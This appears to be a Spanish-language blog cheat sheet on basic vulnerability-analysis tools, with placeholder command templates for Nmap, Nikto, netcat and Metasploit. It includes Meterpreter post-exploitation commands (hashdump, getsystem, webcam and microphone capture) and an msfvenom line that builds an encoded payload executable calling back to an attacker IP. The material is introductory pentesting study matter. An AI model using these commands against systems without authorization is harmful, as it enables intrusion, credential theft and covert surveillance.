Herramientas y conceptos básicos para el análisis de vulnerabilidades
Fierce
Es un escaner de dominio, ayuda a encontrar servidores DNS, transferencias de zona, subredes y hosts de cualquier dominio destino.
fierce --domain <<dominio>>
Nikto
Es un escaner de vulnerabilidades.
nikto -h <<host>> -p <<puertos>>
Whatportis
Permite encontrar puertos asociados a servicios.
whatportis <<servicio>> (Ej. redis)
Ó que servicio está asociado al número de puerto.
whatportis <<puerto>> (Ej. 5432)
Nmap
Es una herramienta para exploración de red.
mmap <<host>>
Opciones
- -Pn (No hacer ping)
- -sV (Detección de versiones de los servicios)
- -O (Detección del sistema operativo)
- -sn (Escaneo rápido - ping scan)
- -script=script
- -D <<dominio>> (Ej. google.com)
Grupos de scripts
- auth
- default
- discovery
- external (Hacia servicios públicos)
- malware
- safe (Pentesting)
- vuln
- all (Corre todo)
- intrusive (Va a tratar de aprovechar las vulnerabilidades)
Netcat
Comprobar la disponibilidad de puertos e información del sistema.
nc -vv <<host>> <<puerto>>
Netstat
Herramienta para monitorear conexiones de red entrantes y salientes.
Listar todos los puertos TCP y UDP
netstat -a
Listar todas las conexiones de puertos de escucha activas.
netstat -l
Metasploit
Es una herramienta para desarrollar y ejecutar exploits.
- Exploit: Es una vulnerabilidad.
- Payload: Es una carga que se ejecuta en una vulnerabilidad.
Iniciar PostgreSQL
/etc/init.d/postgresql start
Reiniciar DB de MSF
cd /usr/share/metasploit-framework
./msfdb reinit
Estatus de conexión DB MSF
db_status
Iniciar MSF
msfconsole
Options
- search <<vuln>> (Ej. ms17-010)
- show exploits
- use <<url exploit>>
- show info
- show options
- set <<option>>
- unset <<option>>
- run (Correr scan)
- exploit (Correr exploit)
- show payloads
- set payload <<url payload>>
- exploit -j -z (Explotar en segundo plano)
- sessions -l
- sessions -i <<ID session>> (numérico)
Meterpreter
Es un payload que se ejecuta en memoria a bajo nivel, tiene opciones y subcomandos propios. (Es un interprete de comandos).
Comandos más utilizados:
cd, rm, rmdir, pws, ls, upload, download, cat, edit, del, mkdir, search.
Webcam commands
record_mic, webcam_list, webcam_snap, screengrab.
System commands
getsystem, hashdump.
Msfvenom
Es una herramienta para generar shellcodes utilizando diferentes payloads.
msfvenom -p <<url payload>> LHOST= <<Mi IP>> LPORT= <<4445>> -f <<formato>> > windows.exe
Arquitectura
--arch x64, x86
Encoder
-e x86/shikata-ga-nai -i 7 //-i número de iteraciones
Plataforma
--platform windows
Publicaciones
Laravel
Pasar mi proyecto laravel a producción
Pasar mi base de datos Laravel a producción
Laravel solo carga la ruta raíz y en las otras obtengo un error del servidor
Agregar Bootstrap o CSS a los correos electrónicos en Laravel
Comandos básicos para facilitar el desarrollo en Laravel
PHP
Formato de texto con PHP (mayúsculas y minúsculas)
Base de datos
Restaurar y respaldar bases de datos MySQL
JavaScript
Linux
Solucionar dependencias faltantes al instalar paquetes .DEB
Herramientas y conceptos básicos para el análisis de vulnerabilidades
Crear accesos autorizados SSH en servidor remoto
Windows
Copiar archivos del subsistema Linux en Windows 10
Activar y desactivar el clima en la barra de tareas de windows
Instalar MongoDB y Compass en Windows
Informativo
Crear un repositorio en GitHub
Lo que debes saber sobre el desarrollo de aplicaciones móviles
Agregar animaciones a mis páginas Web
Formatos de audio más utilizados
Forcsec
Todos los derechos reservados
Al navegar y hacer uso de nuestros servicios aceptas los términos y condiciones.